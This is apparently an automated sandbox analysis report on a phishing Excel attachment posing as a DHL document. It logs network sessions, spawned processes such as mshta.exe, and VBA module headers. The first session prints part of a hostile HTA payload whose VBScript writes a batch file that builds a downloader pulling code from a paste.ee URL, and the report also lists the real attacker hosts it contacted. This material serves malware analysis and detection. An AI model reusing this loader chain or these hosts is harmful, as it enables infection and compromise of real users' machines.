                                • kryx.ru
                                • otelrules.svc.static.microsoft
                                • 198.12.89.24
                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.2649992198.12.89.24807904C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                TimestampBytes transferredDirectionData
                                Mar 15, 2025 08:50:58.273994923 CET286OUTGET /xampp/glorry/iineveryiceskillwithgreatnewsgivenmebest.hta?&valuable=animated HTTP/1.1
                                Accept: */*
                                UA-CPU: AMD64
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                Connection: Keep-Alive
                                Host: 198.12.89.24
                                Mar 15, 2025 08:50:58.738991022 CET1236INHTTP/1.1 200 OK
                                Date: Sat, 15 Mar 2025 07:50:58 GMT
                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                Last-Modified: Fri, 14 Mar 2025 10:54:21 GMT
                                ETag: "778-6304b42c375c3"
                                Accept-Ranges: bytes
                                Content-Length: 1912
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: application/hta
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 78 65 63 75 74 61 72 20 53 63 72 69 70 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 48 54 41 3a 41 50 50 4c 49 43 41 54 49 4f 4e 20 0d 0a 20 20 20 20 20 20 20 20 41 50 50 4c 49 43 41 54 49 4f 4e 4e 41 4d 45 3d 22 53 63 72 69 70 74 45 78 65 63 75 74 6f 72 22 0d 0a 20 20 20 20 20 20 20 20 42 4f 52 44 45 52 3d 22 6e 6f 6e 65 22 0d 0a 20 20 20 20 20 20 20 20 43 41 50 54 49 4f 4e 3d 22 6e 6f 22 0d 0a 20 20 20 20 20 20 20 20 53 48 4f 57 49 4e 54 41 53 4b 42 41 52 3d 22 6e 6f 22 0d 0a 20 20 20 20 20 20 20 20 53 49 4e 47 4c 45 49 4e 53 54 41 4e 43 45 3d 22 79 65 73 22 0d 0a 20 20 20 20 20 20 20 20 57 49 4e 44 4f 57 53 54 41 54 45 3d 22 6d 69 6e 69 6d 69 7a 65 22 0d 0a 20 20 20 20 2f 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 56 42 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 44 69 6d 20 6d 6f 72 70 68 69 6e 69 73 6d 0d 0a 20 20 20 [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html><head> <title>Executar Script</title> <HTA:APPLICATION APPLICATIONNAME="ScriptExecutor" BORDER="none" CAPTION="no" SHOWINTASKBAR="no" SINGLEINSTANCE="yes" WINDOWSTATE="minimize" /> <script language="VBScript"> Dim morphinism Set morphinism = CreateObject("WScript.Shell") Dim technophobe technophobe = "C:\Windows\Temp\eggfruit.bat" Dim hettotypes, regimens Set hettotypes = CreateObject("Scripting.FileSystemObject") Set regimens = hettotypes.CreateTextFile(technophobe, True) regimens.WriteLine "@echo off" regimens.WriteLine "setlocal" regimens.WriteLine "set ""fugues=C:\Windows\Temp\egoize.vbs""" regimens.WriteLine ">" & """%fugues%""" & " (" regimens.WriteLine " echo Dim
                                Mar 15, 2025 08:50:58.739017010 CET992INData Raw: 6e 6f 6e 63 61 74 61 6c 6f 67 2c 20 64 6f 63 75 6d 65 6e 74 61 72 69 73 74 22 0d 0a 20 20 20 20 20 20 20 20 72 65 67 69 6d 65 6e 73 2e 57 72 69 74 65 4c 69 6e 65 20 22 20 20 20 20 65 63 68 6f 20 6e 6f 6e 63 61 74 61 6c 6f 67 20 3d 20 22 22 68 74
                                Data Ascii: noncatalog, documentarist" regimens.WriteLine " echo noncatalog = ""https://paste.ee/d/2rpbzWd4/0""" regimens.WriteLine " echo Set documentarist = CreateObject^(""MSXML2.XMLHTTP""^)" regimens.WriteLine " ech


                                Session IDSource IPSource PortDestination IPDestination Port
                                0192.168.2.264992652.182.143.209443
                                TimestampBytes transferredDirectionData
                                2025-03-15 07:50:01 UTC473OUTPOST /OneCollector/1.0?cors=true&content-type=application%2Fx-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=c498711f02654edca8a715ca6e1cb4d4-dc31da17-845c-4cca-84e5-547d05dad708-6945&upload-time=1742025000584&w=0&anoncknm=al_app_anon&NoResponseBody=true HTTP/1.1
                                Accept-Encoding: gzip, deflate
                                Content-Length: 5616
                                Content-Type: application/json; charset=UTF-8
                                Host: browser.events.data.msn.cn
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-03-15 07:50:01 UTC5616OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 53 65 72 76 65 72 4c 6f 67 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 63 34 39 38 37 31 31 66 30 32 36 35 34 65 64 63 61 38 61 37 31 35 63 61 36 65 31 63 62 34 64 34 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 33 2d 31 35 54 30 37 3a 34 39 3a 35 30 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 64 61 74 61 22 3a 7b 22 70 61 67 65 22 3a 7b 22 70 72 6f 64 75 63 74 22 3a 22 65 6e 74 77 69 6e 64 6f 77 73 64 61 73 68 22 2c 22 61 70 70 54 79 70 65 22 3a 22 77 69 6e 57 69 64 67 65 74 73 22 2c 22 6e 61 6d 65 22 3a 22 77 69 6e 70 32 62 61 63 6b 69 6e 67 61 70 70 22 2c 22 69 73 4d 6f 63 6b 45 6e 76 22 3a 66 61 6c 73 65 2c 22 68 6f 73 74 56 65 72 22 3a 22 35 32 34 2e 33 30 35 30 32 2e 33 30 2e 30 22 2c 22
                                Data Ascii: {"name":"MS.News.Web.ServerLog","iKey":"o:c498711f02654edca8a715ca6e1cb4d4","time":"2025-03-15T07:49:50Z","ver":"4.0","data":{"page":{"product":"entwindowsdash","appType":"winWidgets","name":"winp2backingapp","isMockEnv":false,"hostVer":"524.30502.30.0","


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.2649991188.225.72.1704437904C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                TimestampBytes transferredDirectionData
                                2025-03-15 07:50:58 UTC269OUTGET /RNF52o?&vestment=hard&firewall=tasteless&bread=rapid&beneficiary HTTP/1.1
                                Accept: */*
                                UA-CPU: AMD64
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                Host: kryx.ru
                                Connection: Keep-Alive
                                2025-03-15 07:50:58 UTC509INHTTP/1.1 302 Found
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Sat, 15 Mar 2025 07:50:58 GMT
                                Content-Type: text/plain; charset=utf-8
                                Content-Length: 118
                                Connection: close
                                X-DNS-Prefetch-Control: off
                                X-Frame-Options: SAMEORIGIN
                                Strict-Transport-Security: max-age=15552000; includeSubDomains
                                X-Download-Options: noopen
                                X-Content-Type-Options: nosniff
                                X-XSS-Protection: 1; mode=block
                                Location: http://198.12.89.24/xampp/glorry/iineveryiceskillwithgreatnewsgivenmebest.hta?&valuable=animated
                                Vary: Accept
                                2025-03-15 07:50:58 UTC118INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 38 2e 31 32 2e 38 39 2e 32 34 2f 78 61 6d 70 70 2f 67 6c 6f 72 72 79 2f 69 69 6e 65 76 65 72 79 69 63 65 73 6b 69 6c 6c 77 69 74 68 67 72 65 61 74 6e 65 77 73 67 69 76 65 6e 6d 65 62 65 73 74 2e 68 74 61 3f 26 76 61 6c 75 61 62 6c 65 3d 61 6e 69 6d 61 74 65 64
                                Data Ascii: Found. Redirecting to http://198.12.89.24/xampp/glorry/iineveryiceskillwithgreatnewsgivenmebest.hta?&valuable=animated


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.264999613.107.246.604437904C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                TimestampBytes transferredDirectionData
                                2025-03-15 07:51:13 UTC215OUTGET /rules/rule120201v19s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.18129; Pro)
                                Host: otelrules.svc.static.microsoft
                                2025-03-15 07:51:13 UTC515INHTTP/1.1 200 OK
                                Date: Sat, 15 Mar 2025 07:51:13 GMT
                                Content-Type: text/xml
                                Content-Length: 2781
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 31 Dec 2024 22:07:50 GMT
                                ETag: "0x8DD29E791389B5C"
                                x-ms-request-id: 1cfd798f-001e-008d-457d-95d91e000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20250315T075113Z-186895dd8bdgt46khC1EWRmymw00000005e0000000003602
                                x-fd-int-roxy-purgeid: 0
                                X-Cache-Info: L1_T2
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2025-03-15 07:51:13 UTC2781INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 32 30 31 22 20 56 3d 22 31 39 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 73 61 67 65 2e 43 6c 69 63 6b 53 74 72 65 61 6d 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 55 73 61 67 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120201" V="19" DC="SM" EN="Office.System.SystemHealthUsage.ClickStream" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalUsage" DCa="PSU" xmlns=""> <RIS>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                3192.168.2.264999713.107.246.604437904C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                TimestampBytes transferredDirectionData
                                2025-03-15 07:51:13 UTC214OUTGET /rules/rule170146v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.18129; Pro)
                                Host: otelrules.svc.static.microsoft
                                2025-03-15 07:51:13 UTC491INHTTP/1.1 200 OK
                                Date: Sat, 15 Mar 2025 07:51:13 GMT
                                Content-Type: text/xml
                                Content-Length: 461
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Thu, 14 Nov 2024 16:14:57 GMT
                                ETag: "0x8DD04C77BDE7614"
                                x-ms-request-id: a37c6e3d-601e-0001-546c-95faeb000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20250315T075113Z-186895dd8bdll4fwhC1EWR6rzc00000006eg0000000083uk
                                x-fd-int-roxy-purgeid: 0
                                X-Cache-Info: L1_T2
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2025-03-15 07:51:13 UTC461INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 37 30 31 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 47 72 61 70 68 69 63 73 2e 45 78 70 6f 72 74 42 75 6c 6c 65 74 42 6c 69 70 43 45 78 63 65 70 74 69 6f 6e 22 20 41 54 54 3d 22 63 66 63 66 64 62 39 31 63 36 38 63 34 33 32 39 62 62 38 62 37 63 62 37 62 61 62 62 33 63 66 37 2d 65 30 38 32 63 32 66 32 2d 65 66 31 64 2d 34 32 37 61 2d 61 63 34 64 2d 62 30 62 37 30 30 61 66 65 37 61 37 2d 37 36 35 35 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 34 38 39 66 34 22 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="170146" V="0" DC="SM" EN="Office.Graphics.ExportBulletBlipCException" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="489f4"


                                Click to jump to process

                                Click to jump to process

                                Click to dive into process behavior distribution

                                Click to jump to process

                                Target ID:0
                                Start time:03:50:03
                                Start date:15/03/2025
                                Path:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                Imagebase:0x7ff7ebb40000
                                File size:70'082'712 bytes
                                MD5 hash:F9F7B6C42211B06E7AC3E4B60AA8FB77
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:false

                                Target ID:9
                                Start time:03:50:58
                                Start date:15/03/2025
                                Path:C:\Windows\System32\mshta.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\mshta.exe -Embedding
                                Imagebase:0x7ff74ca80000
                                File size:32'768 bytes
                                MD5 hash:36D15DDE6D71802D9588CC0D48EDF8EA
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:false

                                Target ID:12
                                Start time:03:51:07
                                Start date:15/03/2025
                                Path:C:\Windows\splwow64.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\splwow64.exe 12288
                                Imagebase:0x7ff740380000
                                File size:192'512 bytes
                                MD5 hash:AF4A7EBF6114EE9E6FBCC910EC3C96E6
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:false

                                Target ID:15
                                Start time:03:51:19
                                Start date:15/03/2025
                                Path:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\DHL 733988905ZHH.xla.xlsx"
                                Imagebase:0x7ff7ebb40000
                                File size:70'082'712 bytes
                                MD5 hash:F9F7B6C42211B06E7AC3E4B60AA8FB77
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                Call Graph

                                • Entrypoint
                                • Decryption Function
                                • Executed
                                • Not Executed
                                • Show Help
                                callgraph 1 Error: Graph is empty

                                Module: Sheet1

                                Declaration
                                LineContent
                                1

                                Attribute VB_Name = "Sheet1"

                                2

                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                3

                                Attribute VB_GlobalNameSpace = False

                                4

                                Attribute VB_Creatable = False

                                5

                                Attribute VB_PredeclaredId = True

                                6

                                Attribute VB_Exposed = True

                                7

                                Attribute VB_TemplateDerived = False

                                8

                                Attribute VB_Customizable = True

                                Module: Sheet2

                                Declaration
                                LineContent
                                1

                                Attribute VB_Name = "Sheet2"

                                2

                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                3

                                Attribute VB_GlobalNameSpace = False

                                4

                                Attribute VB_Creatable = False

                                5

                                Attribute VB_PredeclaredId = True

                                6

                                Attribute VB_Exposed = True

                                7

                                Attribute VB_TemplateDerived = False

                                8

                                Attribute VB_Customizable = True

                                Module: Sheet3

                                Declaration
                                LineContent
                                1

                                Attribute VB_Name = "Sheet3"

                                2

                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                3

                                Attribute VB_GlobalNameSpace = False

                                4

                                Attribute VB_Creatable = False

                                5

                                Attribute VB_PredeclaredId = True

                                6

                                Attribute VB_Exposed = True

                                7

                                Attribute VB_TemplateDerived = False

                                8

                                Attribute VB_Customizable = True

                                Module: ThisWorkbook

                                Declaration
                                LineContent
                                1

                                Attribute VB_Name = "ThisWorkbook"

                                2

                                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                3

                                Attribute VB_GlobalNameSpace = False

                                4

                                Attribute VB_Creatable = False

                                5

                                Attribute VB_PredeclaredId = True

                                6

                                Attribute VB_Exposed = True

                                7

                                Attribute VB_TemplateDerived = False

                                8

                                Attribute VB_Customizable = True

                                Reset < >